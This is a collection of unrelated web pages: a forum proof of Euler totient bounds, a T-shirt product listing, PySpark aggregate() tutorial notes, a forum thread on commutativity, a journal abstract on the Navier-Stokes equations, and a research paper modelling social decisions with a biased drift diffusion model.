https://www.cheenta.com/forums/topic/number-theory-2/
• #24794
Kaveri Kayra
Participant
#25059
swastik pramanik
Participant
(b) Let $$n=\prod_{k=1}^r p_k^{a_k}=p_1^{a_1}p_2^{a_2}p_3^{a_3}\cdots p_r^{a_r}$$ . So, $$\phi(n) =n\left(1-\frac{1}{p_1}\right) \left(1-\frac{1}{p_2}\right)\cdots \left(1-\frac{1}{p_r}\right)$$ .
For any prime $$p$$ the inequality $$2p-2\geq p$$ holds, i.e., $$\frac{p-1}{p}\geq \frac{1}{2}$$. This is true for each of the $$r$$ primes dividing $$n$$, and multiplying the $$r$$ inequalities gives $$\left(1-\frac{1}{p_1}\right) \left(1-\frac{1}{p_2}\right)\cdots \left(1-\frac{1}{p_r}\right)\geq \frac{1}{2^r}$$ . Multiplying both sides by $$n$$ gives $$n\left(1-\frac{1}{p_1}\right) \left(1-\frac{1}{p_2}\right)\cdots \left(1-\frac{1}{p_r}\right)\geq \frac{n}{2^r}$$ , that is, $$\phi(n)\geq \frac{n}{2^r}$$ , as required.
#25089
swastik pramanik
Participant
(a) Let $$n=2^{k_0}p_1^{k_1}p_2^{k_2}\cdots p_r^{k_r}$$ . So, $$\phi(n)=2^{k_0-1}p_1^{k_1-1}p_2^{k_2-1}\cdots p_r^{k_r-1}(2-1)(p_1-1)(p_2-1)\cdots (p_r-1)$$ . Now, we use the inequalities $$k-\frac{1}{2}\ge \frac{k}{2}$$ (valid for $$k\ge 1$$) and $$p-1>\sqrt{p}$$ for $$p>2$$. So, we have $$\phi(n)\ge 2^{k_0-1}p_1^{k_1/2}p_2^{k_2/2}\cdots p_r^{k_r/2}\ge \frac{1}{2}\sqrt{n}$$ .
Now, also $$p-1<p$$ . So, $$\phi(n)\le 2^{k_0}p_1^{k_1}p_2^{k_2}\cdots p_r^{k_r}=n$$ .
Combining them up we get $$\frac{1}{2}\sqrt{n}\le \phi(n)\le n$$ as required.
(c) Let $$p$$ be the smallest prime divisor of $$n$$, so that $$p\le \sqrt{n}$$ (here $$n$$ is composite). Then $$\phi(n) \le n\left(1-\frac{1}{p}\right)$$ . Since $$p\le \sqrt{n}$$, we have $$\frac{1}{p}\ge \frac{1}{\sqrt{n}}$$ and hence $$1-\frac{1}{p}\le 1-\frac{1}{\sqrt{n}}$$. So, $$\phi(n) \le n\left(1-\frac{1}{p}\right)\le n\left(1-\frac{1}{\sqrt{n}}\right)=n-\sqrt{n}$$.
Hence, we are done! 🙂
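(Not part of the thread, but the bounds are easy to sanity-check numerically. A small Python sketch with a naive totient; part (c) is tested only for composite $$n$$, since only then is the smallest prime factor at most $$\sqrt{n}$$:)
from math import gcd, isqrt, sqrt
def phi(n):
    # naive Euler totient: count 1 <= k <= n with gcd(k, n) = 1
    return sum(1 for k in range(1, n + 1) if gcd(k, n) == 1)
def omega(n):
    # number of distinct prime factors of n
    r, m, p = 0, n, 2
    while p * p <= m:
        if m % p == 0:
            r += 1
            while m % p == 0:
                m //= p
        p += 1
    return r + (1 if m > 1 else 0)
for n in range(2, 500):
    assert sqrt(n) / 2 <= phi(n) <= n                     # part (a)
    assert phi(n) >= n / 2 ** omega(n)                    # part (b)
    if any(n % p == 0 for p in range(2, isqrt(n) + 1)):   # n composite
        assert phi(n) <= n - sqrt(n)                      # part (c)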
https://www.spreadshirt.com/women+it+never+gets+easier+t-shirts
It Never Gets Easier T-Shirts for Women
GET STRONGER
by
XYC
it never gets easier
losing a pet never gets easier
It Never Gets Easier You Just Get Stronger
It Never Gets Easier You Just Get Stronger
It Never Gets Easier, You Just Get Better.
It never gets easier you just get better
It Never Gets Easier You Just Get Stronger
It never gets easier you just get better
Funny Running Design It Never Gets Easier
Its Never Gets Easier You Just Get Stronger Nurse
Never Gets Easier You Just Get Better- Gaming - TB
Never Gets Easier You Just Get Better- Gaming - TB
Aerobic - It Never Gets Easier You Just Get Stro
Yoga- it never gets easier you just get stronger
It Never gets Easier,You Just Get Better Ping Pong
Yoga it never gets easier you just get stronger
It Never Get Easier You Just Get Better T-Shirt
IT NEVER GETS EASIER YOU JUST GET STRANGER Quote
Never Gets Easier You Just Get Better- Gaming - TB
Biker - It never gets easier you just get faster
Life Doesn't get easier, You just get stronger.
GET STRONGER
by
XYC
ER Nurse Shirt
You just get stronger!
It's a match!
It's a match!
It's a match!
I do gardening for a living. funny weed leaf shirt
https://napsterinblue.github.io/notes/spark/basics/aggregate_fn/
# The Aggregate Function
import findspark
findspark.init()
import pyspark
sc = pyspark.SparkContext()
# aggregate
Let’s assume an arbitrary sequence of integers.
import numpy as np
vals = [np.random.randint(0, 10) for _ in range(20)]
vals
[5, 8, 9, 3, 0, 6, 3, 9, 8, 3, 4, 9, 5, 0, 8, 4, 2, 3, 2, 8]
rdd = sc.parallelize(vals)
### Finding the mean
Assume further that we can’t just call the handy mean method attached to our rdd object.
rdd.mean()
4.95
We’d create the mean by getting a sum of all values and a total count of numbers.
sum(vals) / len(vals)
4.95
In Spark, we recreate this logic using a two-fold reduce via a Sequence Operation and a Combination Operation.
The seqOp is a reduce step that happens per partition, whereas the combOp is how we take the reduced values and bring them together.
total, counts = rdd.aggregate(zeroValue=(0, 0),
                              seqOp=(lambda x, y: (x[0] + y, x[1] + 1)),
                              combOp=(lambda x, y: (x[0] + y[0], x[1] + y[1])))
total / counts
4.95
## Under the Hood
For purposes of demonstration, let’s look at something a bit easier.
Starting at 0. Simple sum. Then take the max.
rdd.aggregate(zeroValue=0,
              seqOp=lambda x, y: x + y,
              combOp=lambda x, y: max(x, y))
29
Why did we get this value? Peeking inside the partitions of rdd we can see the distinct groups.
brokenOut = rdd.glom().collect()
brokenOut
[[5, 8, 9, 3, 0], [6, 3, 9, 8, 3], [4, 9, 5, 0, 8], [4, 2, 3, 2, 8]]
The sum inside each partition looks like
[sum(x) for x in brokenOut]
[25, 29, 26, 19]
Thus, taking the max of each of these intermediate calculations looks like
max([sum(x) for x in brokenOut])
29
Thus, we must be careful in writing our seqOp and combOp functions, as their results depend on how the data is partitioned.
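To see that dependence directly, we can force the same values into a different number of partitions and re-run the same aggregate (a quick sketch, reusing vals and sc from above). With two partitions the per-partition sums should come out as [54, 45], so the combOp max now returns 54 instead of 29.
rdd2 = sc.parallelize(vals, 2)   # same values, forced into two partitions
rdd2.aggregate(zeroValue=0,
               seqOp=lambda x, y: x + y,
               combOp=lambda x, y: max(x, y))
54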
https://www.physicsforums.com/threads/algebra-question.714911/
# Algebra Question
Hello,
I wanted to confirm that I am understanding something correctly. I have been doing this all the time, and have never had any problems with it. For some reason now I am wanting to confirm it.
So, if you have something such as: x^3 - 6 + y^2 - √z it would be equivalent to write it as: y^2 + x^3 - √z - 6
Can you always rearrange terms like this, no matter what they are? What I do is write it as an addition problem so I can change the order, since you can change the order in addition.
For example if you have: log(x) - x^3 you could write it as log(x) + (-x^3) then as -x^3 + log(x).
Just as -11+5-3+5=-4 would be the same as 5-11-3+5=-4 or -11-3+5+5=-4
Does my reasoning seem correct?
Thanks
Last edited:
Yes that is correct. I believe that falls under the commutative property which essentially states
x + y = y + x
And this would also go for multiplication, but not division, correct?
Correct.
Example using decimal notation:
2*4 = 8 and 4*2 = 8
8 = 8 TRUE
2/4 = .5 and 4/2 = 2
.5 = 2 FALSE
And here's a tip: never be afraid to go back to the most basic of examples to solidify your thoughts if you start questioning them. Forget the log(x) and x^3 stuff and just use a scratch piece of paper and walk through simple things like 1+2 = 2+1 to convince yourself that the order of addition does not matter.
arildno
Homework Helper
Gold Member
Dearly Missed
Hi, ThomasMagnus!
As the others have said, you are correct.
The two operations multiplication and addition are COMMUTATIVE, i.e, you can change the order in which they appear.
Division and subtraction are NOT commutative, we can call them ANTI-commutative if you like.
But, as you yourself noted, can't we rewrite 5-4 as 5+(-4)=(-4)+5?
Yes, we can, by using negative numbers in addition, we can think of the operation of subtraction as "redundant", i.e, the info is contained in the use of adding with negative numbers instead.
That makes for easier calculations, because you then can go about commuting as much as you want!
In 5-(-4), for example, we just write 5-(-4)=5+(-(-4))=(-(-4))+5 and so on.
Does something similar exist with division relative to multiplication?
Yes, because division by a non-zero number "a" can always be thought of as multiplication with the reciprocal of "a", i.e, 1/a.
Thus, 2/4=2*(1/4)=(1/4)*2.
----------------
By thinking in terms of "negative numbers" and "reciprocals", you really have only two basic operations to worry about, addition and multiplication, rather than four operations.
(And, if you think of multiplication as repeated addition, there's only one fundamental operation to worry about..)
HallsofIvy
Homework Helper
And this would also go for multiplication, but not division, correct?
Yes, and note that it is largely because of this (and perhaps even more because addition and multiplication are "associative" while subtraction and division are not) that we do not consider subtraction and division as separate "operations" but just the inverses of addition and multiplication. That is, "a subtract b" is just "a plus the additive inverse of b" and "a divided by b" is "a multiplied by the multiplicative inverse of b".
arildno
Homework Helper
Gold Member
Dearly Missed
When we think of ONE operation to be performed, commutativity is the only property that comes into the picture.
However, when we have two or more operations to be performed, we must also take into account what we call the associativity of the operations, that is, what relevance it has which operation we perform first.
We have, for example, for numbers "a", "b" and "c" that:
(a+b)+c=a+(b+c), that is, it doesn't matter WHICH addition we perform first. Addition is associative.
But, is:
(a-b)-c=a-(b-c)??
You easily see that subtraction is NOT associative at all;
We have that (a-b)-c=a-(b+c), whereas a-(b-c)=(a-b)+c
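(These identities are easy to spot-check with concrete numbers — a throwaway Python check, in the spirit of the scratch-paper tip above:)
a, b, c = 7, 3, 2
print(a + b == b + a)                # True: addition is commutative
print(a * b == b * a)                # True: multiplication is commutative
print((a - b) - c == a - (b + c))    # True: first rewrite rule above
print(a - (b - c) == (a - b) + c)    # True: second rewrite rule above
print((a - b) - c == a - (b - c))    # False: subtraction is not associative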
Thank you for the info! So the next time I see something in an answer key along the lines of x-b+c and I have -b+c+x, I can assume they are exactly the same, correct? Also, does this go for all terms, even something such as ln|x-1|-ln|x|+6 = -ln|x|+ln|x-1|+6?
Thanks!
arildno
Homework Helper
Gold Member
Dearly Missed
"Also, does this go for all terms, even something such as ln|x-1|-ln|x|+6=-ln|x|+ln|x-1|+6"
That's right!
https://www.projecteuclid.org/euclid.kjm/1256219158
## Journal of Mathematics of Kyoto University
### The relation between stationary and periodic solutions of the Navier-Stokes equations in two or three dimensional channels
Teppei Kobayashi
#### Abstract
In this paper we consider whether there exists a time-periodic solution of the Navier-Stokes equations in infinite channels in $\mathbb{R}^n$ ($n=2,3$). H. Beirão da Veiga [4] treated such a problem. This paper treats a special case of his and studies the relation between the existence of stationary and time-periodic solutions of the Navier-Stokes equations.
#### Article information
Source
J. Math. Kyoto Univ., Volume 49, Number 2 (2009), 307-323.
Dates
First available in Project Euclid: 22 October 2009
https://projecteuclid.org/euclid.kjm/1256219158
Digital Object Identifier
doi:10.1215/kjm/1256219158
Mathematical Reviews number (MathSciNet)
MR2571843
Zentralblatt MATH identifier
1180.35414
#### Citation
Kobayashi, Teppei. The relation between stationary and periodic solutions of the Navier-Stokes equations in two or three dimensional channels. J. Math. Kyoto Univ. 49 (2009), no. 2, 307--323. doi:10.1215/kjm/1256219158. https://projecteuclid.org/euclid.kjm/1256219158
https://www.nature.com/articles/s41467-018-05994-9?error=cookies_not_supported&code=6e230ea0-0d8a-436b-a489-d350bc110824
## Introduction
Social decisions typically involve conflicts between selfishness and pro-sociality. A basic goal in decision science is to understand the cognitive processes that underlie these social decisions. There is a large literature describing the various factors that influence other-regarding behavior, including distributional preferences1,2,3, reciprocity4, social distance5, and guilt-aversion6, but these are all static models that simply predict choice outcomes. Recently there have been efforts to understand the dynamics of social decision making, with both single-process7,8,9 and dual-process10,11,12 models. However, the nature of social decision making is still disputed7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24.
One question is whether social decisions are the result of a single comparison process, or the result of two processes: one, a fast and intuitive process and the other, a slow and deliberative process7,10? The second question is whether people exhibit a selfish or a pro-social bias. The latter question is usually posed under the presumption of dual processes: given that there is an intuitive process, does it favor selfishness or pro-sociality?
To answer this question, some dual-process researchers have examined relative response times (RT)10,11,13,14,17,18,19,23 to establish people’s intuitions. However, it has recently been argued that RT data cannot be used as evidence for intuitive/deliberative processes, since they are sensitive to the particular choice problems used by the researchers7,16,25.
An alternative approach which does not have this limitation is to experimentally manipulate RT (e.g., using time pressure) or impose cognitive load to try to establish people’s intuitive responses. In this manipulation literature, some have made a distinction between behavior in giving contexts (e.g., dictator games) and in cooperative contexts (e.g., public goods games).
In the giving context, subjects are simply asked whether they would like to give some of their money to another person (or charity). Here, some studies conclude that promoting intuition increases altruistic behavior15, while others find no effect of promoting intuition20. A meta-analysis finds that promoting intuition increases giving for women but not for men26.
In the cooperative context, subjects are put into groups of two or more and can pay a cost to give a larger benefit to the other(s) in their group. Here, some studies conclude that people’s intuition favors cooperation10,24,27, while other studies conclude that promoting intuition has no effect on cooperation21,22,28; a meta-analysis finds that intuition promotes cooperation29, and that—unlike for giving behavior—this is equally true for both women and men30. (One study in which participants were incentivized to make a choice quickly and then could subsequently change their decision did not find a difference between giving and cooperation31). Here we have decided to focus on the giving context, since these games are easier to interpret, as they do not depend on subjects’ beliefs about others’ choices.
Given the mixed evidence for whether intuition favors pro-sociality, cooperation, or selfishness, we return to the question of whether a single comparison process might better describe social decisions. A growing literature in decision neuroscience has argued for the prevalence of sequential sampling model (SSM) processes in decision making and cognition. These models, exemplified by the drift diffusion model (DDM), assume that information is sampled continuously until there is sufficient net evidence for one of the available options32.
One challenge to the simple SSM story in ref. 7 is the body of time pressure results reported in some articles10,21,24,27,28. If, indeed, time pressure amplifies existing behavioral tendencies10, an unbiased SSM (no starting point bias) cannot account for that behavior. In a SSM framework, time pressure reduces the amount of evidence needed to reach a decision, reducing RT but also consistency. In an unbiased SSM, reducing consistency should push the probability of any particular response towards 50%.
In some cases, decision makers may exhibit a bias towards one response, perhaps because that response consistently yields better outcomes. This behavior is captured by a bias in the starting point of the process33,34,35,36,37. In such cases, reducing the amount of evidence needed to reach a decision will amplify the choice bias. The starting point is therefore the natural candidate for explaining the purported effects of time pressure on social preferences.
We have two goals in this paper. The first is to document the effects of time-pressure and time-delay, using a wide array of decision problems and accounting for individuals’ social preferences. The second is to argue for a DDM with biased starting points (“biased DDM”), which integrates the dual process framework with the SSM framework and can account for both RTs and the effects of time manipulations. We provide a clear mechanism for how a predisposition (which some might call an “intuition”) and deliberation might interact to yield a decision. In sum, we aim to offer a unified account of social decision making that provides a clear explanation for the conflicting RT and time-pressure data in the literature.
We test our model using an experiment where subjects made binary decisions in a series of mini-dictator games, in time-free, time-pressure, and time-delay conditions. We take each subject’s change in pro-sociality from time-delay to time-pressure conditions as the measure of their predisposition. We find that people are heterogeneous in whether they are predisposed to pro-sociality (more pro-social under time pressure) or selfishness (more selfish under time pressure). In an out-of-sample test, this predisposition predicts subjects’ pro-sociality in the time-free condition. We then fit the biased DDM to the time-free data, show that it outperforms an unbiased DDM (and in some cases, a standard logistic choice model8), and find that subjects’ predispositions predict their starting points in the model. In particular, subjects with starting points biased towards pro-sociality become more pro-social under time pressure and more selfish under time delay, while subjects with starting points biased towards selfishness become more selfish under time pressure and more pro-social under time delay.
## Results
In the experiment, subjects made binary decisions in 200 mini-dictator games, where they allocated money between themselves (dictator) and another subject (receiver) anonymously. Each decision involved a conflict between selfishness and advantageous inequality aversion2 (Fig. 1, Supplementary Fig. 1). In other words, each game offered subjects the opportunity to increase the receiver’s earnings by reducing their own earnings, reducing the inequality between them (see Supplementary Note 1).
We divided the 200 trials into four blocks of 50 games each. In the time-pressure block, subjects had to make each decision within 2 s. In the time-delay block, subjects had to make each decision after viewing the options for 10 s. In the other two (time-free) blocks, subjects had unlimited time to make each decision. The first and last blocks were time-free blocks, while the other two were counterbalanced across subjects (see Methods, Supplementary Methods for more detail).
### The bias towards selfishness or pro-sociality
We employ the inequality aversion model proposed by Fehr and Schmidt2 to estimate subjects’ preferences (advantageous inequality aversion, β) under time-free (βf), time-pressure (βp), and time-delay (βd) conditions separately (see Methods). The estimation results show that the effect of decision time differs substantially across subjects. To see this, we split subjects according to the median indifference β (the β which would make a subject indifferent between the two options) from all of our choice problems; with this cutoff, 93% of the selfish subjects chose the selfish option on the majority of trials, while 100% of the pro-social subjects chose the pro-social option on the majority of trials (see Supplementary Note 2 for analyses based on other cutoffs).
Subjects with higher βf (pro-social subjects) became more pro-social under time pressure (P = 0.024, two-sided Wilcoxon signed-rank test, since β is not normally distributed), while subjects with lower βf (selfish subjects) became more selfish under time pressure (P = 0.041) (Fig. 2a). Similarly, pro-social subjects became marginally less pro-social under time delay (P = 0.167), while selfish subjects became less selfish under time delay (P = 0.004), though these effects are less pronounced (Fig. 2b). The effect of decision time for pro-social and selfish subjects is more obvious if we compare time pressure and time delay conditions directly (Fig. 2c) (see Supplementary Table 1 for regression results).
In addition, βp − βd is correlated with βf (two-sided Spearman correlation test, r = 0.390, P = 5 × 10^−5, Supplementary Fig. 2, Supplementary Tables 2-3). In other words, subjects were heterogeneous in the way in which reduced time affected their pro-sociality, and this effect predicted their pro-sociality under normal (time-free) conditions.
### Sequential sampling process
Prior studies have shown that behavior in social decision making is in line with SSM predictions7,8,9. Specifically, RT decreases with strength of preference. Our experiment not only allows us to test this hypothesis, but also allows us to test whether this hypothesis still holds under time pressure. In particular, if decisions under time pressure exclusively (or preferentially) rely on an intuitive, automatic process, then we might expect no (or a greatly reduced) relationship between RT and strength of preference.
To test this, we calculated the utility difference between Option A and Option B in the experiment (as an index of the strength of preference) using the estimated preference parameters (βf, βp, βd). Mixed-effects regressions with log(RT) as the dependent variable reveal that RT was negatively related with the absolute utility difference in the time-free and time-pressure conditions (and marginally in the time-delay condition) (t(4997) = −9.71, P < 0.001 for the time-free condition, t(4997) = −7.186, P < 0.001 for the time-pressure condition, and t(4997) = −1.718, P = 0.086 for the time-delay condition) (Fig. 3). The relationship between RT and strength-of-preference is understandably weaker in the time-delay condition, since it is likely that in many cases subjects decided in under 10 s. In those cases, the true decision times are unobservable, and we should expect no relationship between RT and strength-of-preference.
### The biased DDM
These results paint a complex picture. On the one hand, the relationship that we observe between RT and strength of preference in all time conditions is consistent with a single SSM process. On the other hand, the amplification of preferences under time pressure (and attenuation under time delay) is the opposite of what one would expect from time pressure in an unbiased SSM. Here, we argue that a SSM with starting points biased towards subjects’ generally preferred actions can account for these patterns (Fig. 4).
To make things more concrete, we focus on the DDM32, which was originally developed for memory, cognition, and perception and has been increasingly used to study economic decision making7,8,38,39,40,41,42,43,44,45. The DDM assumes that decisions are generated by a noisy process that accumulates relative evidence (R) that one option is better than the other. The relative evidence R follows a diffusion process and evolves in small time increments according to a stochastic difference equation, R_{t+1} = R_t + v + s_t (with discrete time this is technically a random walk model), where v is the drift rate that represents the average strength of preference for the selfish option, and s_t represents mean-zero Gaussian noise. A choice is made once R reaches one of the two thresholds; we normalize the pro-social threshold to zero and the selfish threshold to a constant, a. An additional feature of the DDM is that there can be an initial bias in the starting point (R0), often referred to as a response bias46, towards selfishness or pro-sociality.
For now, we will assume that these starting points are biased towards a subject’s generally preferred choice; later we will verify this assumption by fitting the starting points to the data. Specifically, the process starts near the selfish threshold for subjects who are generally selfish (R0 > a/2), and the process starts near the pro-social threshold for subjects who are generally pro-social (R0 < a/2).
To see why starting point biases are necessary to account for our choice data, let’s first consider a simple DDM without starting point biases (unbiased DDM). In that model, drift rate is the sole determinant of “preference” in a given choice situation, where we define preference as the option that the subject would choose given unlimited time to decide. In our setting, the drift rate determines whether the subject is more than 50% likely to choose the selfish option, with positive drift rates producing predominantly selfish choices and negative drift rates producing predominantly pro-social choices. For a given drift rate, the threshold separation determines the subject’s preference-choice consistency. With infinite threshold separation, the subject would always choose in line with their preference, while with zero threshold separation, the subject would choose randomly.
In the DDM literature, time pressure is modeled using narrower decision thresholds (or in the case of time limits, collapsing thresholds), which reduce RT at the cost of consistency. This assumption is supported by a large body of research showing that time pressure narrows thresholds but does not affect drift rates32,47,48. Whether thresholds also collapse over time is an active debate in the DDM literature, with conflicting theoretical and empirical arguments49,50,51,52,53.
To visualize the effects of time pressure on choice behavior in the unbiased DDM, we simulated 50 fake subjects with drift rates sampled from a uniform distribution vi ∈ [−0.0002, 0.0002] ms^−1, and with a threshold separation of either a = 2 or a = 1. For each fake subject, we simulated 1000 trials with each threshold separation. What the simulations clearly show is that these fake subjects’ selfish choice probabilities are consistently closer to 50% with the narrower thresholds, i.e. under time pressure (Fig. 5a; also with collapsing thresholds, see Supplementary Fig. 3a). This is opposite to the pattern we see in our data.
Now let’s consider what happens when subjects’ decisions are partly determined by starting points. With infinite threshold separation, the starting point would have no effect and the subject would always choose in line with their preference. However, with finite threshold separation, the narrower the thresholds, the more influence the starting points have on the decision.
To visualize the effects of time pressure on choice behavior in the DDM with biased starting points (biased DDM), we again simulated 50 fake subjects with the same distribution of drift rates and threshold separations as before. We additionally assumed that each fake subject’s starting point (relative to a/2) was proportional to their drift rate. Specifically, a fake subject’s starting point was R0=a/2 + 5000·v. As before, for each fake subject, we simulated 1000 trials with each threshold separation. What these simulations clearly show is that the fake subjects’ choice probabilities are consistently more extreme with the narrower thresholds, i.e., under time pressure (Fig. 5b; also with collapsing thresholds, see Supplementary Fig. 3b). This is the pattern we see in our data.
These latter simulations assume that a subject’s starting point is proportional to their drift rate. We believe this to be a reasonable assumption, since subjects with more extreme preferences will find themselves more often making the same choice (either selfish or pro-social) and so may want to adjust their starting points further in that direction, to save time. Indeed, this is a likely mechanism for how people generate predispositions. Below, we verify this assumption by showing that βf correlates with starting points. Nevertheless, a simpler model, for example R0 = a/2 ± 0.25, produces the same phenomenon of more extreme choice probabilities with narrower thresholds, but displays a discontinuity in choice behavior, due to the starting-point discontinuity at v = 0 (Fig. 5c; also with collapsing thresholds, see Supplementary Fig. 3c).
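The proportional-bias simulation is easy to reproduce. The following is my own minimal Python sketch of the setup just described, not the authors' code: the drift range, thresholds, and the R0 = a/2 + 5000·v rule follow the text, while the time step, noise scale, trial count, and the clipping of extreme starting points are my assumptions.
import numpy as np
rng = np.random.default_rng(0)
def ddm_choice(v, a, r0, dt=10.0, sigma=0.02):
    # One biased-DDM trial in discrete time: R <- R + v*dt + Normal(0, sigma*sqrt(dt)).
    # Returns True if the selfish threshold a is hit before the pro-social threshold 0.
    R = r0
    while 0.0 < R < a:
        R += v * dt + rng.normal(0.0, sigma * np.sqrt(dt))
    return R >= a
drifts = rng.uniform(-2e-4, 2e-4, size=50)    # one drift rate per fake subject (per ms)
for a in (2.0, 1.0):                          # wide thresholds vs. narrow (time pressure)
    starts = np.clip(a / 2 + 5000 * drifts, 0.05 * a, 0.95 * a)  # clipping is my safeguard
    p_selfish = np.array([np.mean([ddm_choice(v, a, r0) for _ in range(100)])
                          for v, r0 in zip(drifts, starts)])
    print(a, np.abs(p_selfish - 0.5).mean())  # choice biases are amplified when a = 1.0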
The simulations above are simplified in the sense that they assume a single drift rate (i.e., strength-of-preference) per subject. In the real experiment, each subject experienced a variety of decisions and therefore a variety of drift rates. Therefore, as a robustness check, we carried out the simulations behind Fig. 5 using the actual parameters estimated from the time-free data. We then compared the resulting βf and βp estimated from the simulated data. The biased DDM simulations (Supplementary Fig. 4a and Supplementary Fig. 4c) produced similar patterns as seen in the data (Figs. 2, 5). That is, the results show that under time pressure, simulated selfish subjects (split according to median indifference β) became more selfish and simulated pro-social subjects became more pro-social. Similar to Fig. 5a, the pattern produced by the unbiased DDM simulations (Supplementary Fig. 4b and Supplementary Fig. 4d) is not consistent with the results seen in the experiment.
In sum, if the only difference between selfish and pro-social subjects was their drift rates, then time pressure should have brought their behavior closer together (not observed in the data), but if they also differed in their starting points, then time pressure should have made their behavior more extreme (observed in the data). Differences between groups in other parameters might additionally be present, but they cannot explain the time-pressure phenomenon without biased starting points, since the effects of narrower (or collapsing) thresholds on choice (Fig. 5a, Supplementary Figs 3a, 4b, d) do not depend on the initial threshold separation or drift rates.
In the next section, we attempt to verify these conclusions with formal model fits on data independent from the data used to classify subjects as being predisposed to selfish or pro-social behavior. Specifically, we separate subjects based on whether they became more or less pro-social under tighter time constraints. We hypothesized that both groups of subjects would be better fit by DDMs with biased starting points than ones without. We additionally hypothesized that the subjects who became more pro-social under tighter time constraints would exhibit starting points biased towards the pro-social threshold, while subjects who became more selfish under tighter time constraints would exhibit starting points biased towards the selfish threshold.
### Model fitting
We first split subjects based on how their preferences changed from time-pressure to time-delay conditions, resulting in 56 selfishly predisposed subjects (βp < βd) and 46 pro-socially predisposed subjects (βp > βd). Splitting by gender, 24 of 56 (43%) females and 22 of 46 (48%) males were pro-socially predisposed, in contrast to the findings from ref. 26.
We fit the DDM at both the group and individual level on the time-free data. We focus exclusively on fitting the time-free data since these are the only data that display the roughly log-normal RT distributions produced by the DDM. The time constraints in the other two conditions distort the RT distributions and preclude fitting DDMs to those data (Supplementary Fig. 5).
Our hypothesis was that the relative starting point, z = R0/a (z ∈ [0,1]), would be greater (less) than 0.5 for the selfishly predisposed (pro-socially predisposed) subjects. The starting point z was indeed greater than 0.5 (0.547 at the group level, and an average of 0.564 at the individual level) for selfishly predisposed subjects, and was less than 0.5 (0.403 at the group level and an average of 0.452 at the individual level) for pro-socially predisposed subjects (Table 1, Supplementary Table 4). At the individual level, the starting points were greater than 0.5 for 40 of 56 selfishly predisposed subjects (P = 0.002, two-sided Binomial test), and the starting points were less than 0.5 for 30 of 46 pro-socially predisposed subjects (P = 0.054) (see Supplementary Table 4 and Supplementary Note 3).
In the previous section, we assumed that starting points would be correlated with subjects’ generally favored options. Verifying this assumption, we found that the starting points were negatively correlated with βf (two-sided Spearman correlation test, r = −0.594, P = 10^−11, Fig. 6a). Importantly, starting points were also negatively correlated with βp − βd (r = −0.460, P = 10^−6, two-sided Spearman correlation test) (Fig. 6b, Supplementary Fig. 6). In other words, subjects who were more pro-social under time pressure compared to time delay, showed a larger starting point bias towards the pro-social threshold in the time-free condition. This indicates that we can use starting points, estimated on time-free data, to expose underlying biases which in the past have been inferred by comparing time-constrained conditions.
Finally, a logistic regression of βp − βd on DDM parameters (Supplementary Table 5) revealed that the only significant predictor was the starting point bias (P = 0.006). This indicates that the starting point bias is likely the key mechanism to explain the impact of time constraints.
### Model validation
When fitting models to data, there is always a concern of over-fitting. That is why we have focused on the relationship between time-free model parameters and behavior in the time-pressure and time-delay conditions. Taking this idea a step further, in this section we test whether the time-free model with biased starting points (biased DDM) provides better fits after accounting for the number of model parameters (using BIC) and whether it can better predict other out-of-sample time-free data.
Looking at the individual-level fits, the BICs of the biased DDM were lower than the BICs of the unbiased DDM for 71 (of 102) subjects (two-sided Binomial test, P < 10^−4). That is, the biased DDM generally fits the data better than the unbiased DDM. Specifically, the biased DDM fits the data better than the unbiased DDM for subjects who have a larger starting point bias, while the unbiased DDM fits the data better than the biased DDM for subjects whose starting point is near 0.5 (Fig. 6a).
Next we validate the biased DDM by comparing its out-of-sample predictions with those of the unbiased DDM and logistic choice models54,55. In one logistic model (Logit), the dependent variable was a dummy indicating whether the choice was selfish or pro-social, and the independent variables were the difference between the dictator’s payoffs (DicDiff) and the difference between the receiver’s payoffs (ReceDiff). In a second logistic model (Logit+RT), we added another independent variable, RT. More specifically, we estimated these models for selfishly predisposed and pro-socially predisposed subjects separately using one half of the data (Games 1–50) and used the estimated parameters to predict choices in the other half of the data (Games 51–100, see Methods). We then calculated the absolute error (AE) between the predicted and empirical probabilities of choosing the selfish option in each game (Table 2; see also Supplementary Figs 7–9, Supplementary Table 6).
The summed AE for the biased DDM was less than that for the unbiased DDM for both selfishly predisposed and pro-socially predisposed subjects. Since the number of selfishly predisposed and pro-socially predisposed subjects was not equal, we also used Cramer’s λ56 to quantify each model’s predictive power (higher λ = better predictions). Cramer’s λ for the biased DDM (0.198) was higher than that of the unbiased DDM (0.163), Logit (0.1648), and Logit+RT (0.1650). Therefore, the biased DDM generally outperformed the other models in terms of out-of-sample predictions.
## Discussion
Our paper provides an alternative account for the cognitive processes underlying social decision making. Subjects are heterogeneous in whether they generally favor selfishness or pro-sociality. This produces a bias in their initial belief that the selfish or pro-social option is the better choice. Once the options appear, subjects update their initial beliefs by evaluating and comparing the options, in line with a SSM account. Thus, a DDM with biased starting points unifies single- and dual-process accounts of social decision making, allowing us to explain features of the data, and other findings in the literature, that otherwise could not be explained by either account on its own. In particular, it captures the relationship between strength-of-preference and RT, while also explaining why choice biases are magnified under time pressure and attenuated under time delay. Other evidence-accumulation models that are designed to capture intuition57,58 do not explain these results. The model in ref. 57 does not explicitly predict any effects of time pressure or time delay, and the model in ref. 58 predicts a bi-modal RT distribution, which is not the case in our data (Supplementary Fig. 5).
Our out-of-sample prediction results reveal that the biased DDM outperforms the simple unbiased DDM and logistic choice models in predicting choices. Thus, it is important to take these prior biases into account when modeling social decision making. These results also underline the usefulness of computational models for describing social behavior59,60. In particular, what we are suggesting is that time pressure affects decisions not by engaging a different decision process, but instead by simply allowing less time for the decision maker to update from their prior. Thus, under time pressure, the prior plays a larger role in determining the decision.
One might wonder how a starting point would be biased towards the selfish or pro-social option? Starting-point biases are more often associated with response biases (e.g., spatial biases) and it is not immediately obvious how this would translate to a setting where the alternatives vary across trials. One likely possibility is that subjects initially scan their own payoffs to determine which option is better for them, consistent with ref. 17. This is consistent with the idea that most of the non-decision time is for stimulus encoding.
An advantage of our approach is that it relies on a well-established modeling framework that has proven useful in many domains of human behavior61,62 and that has substantial support from neural data63,64,65,66. Moreover, the consequences of starting point biases in SSMs are mathematically precise and well understood, generating falsifiable predictions that can be tested with choice and RT distributions. Although here we have restricted ourselves to the dictator game, this framework could be applied to cooperative settings, provided that beliefs could be measured or estimated, and utilities calculated. This would be a useful next step for this research.
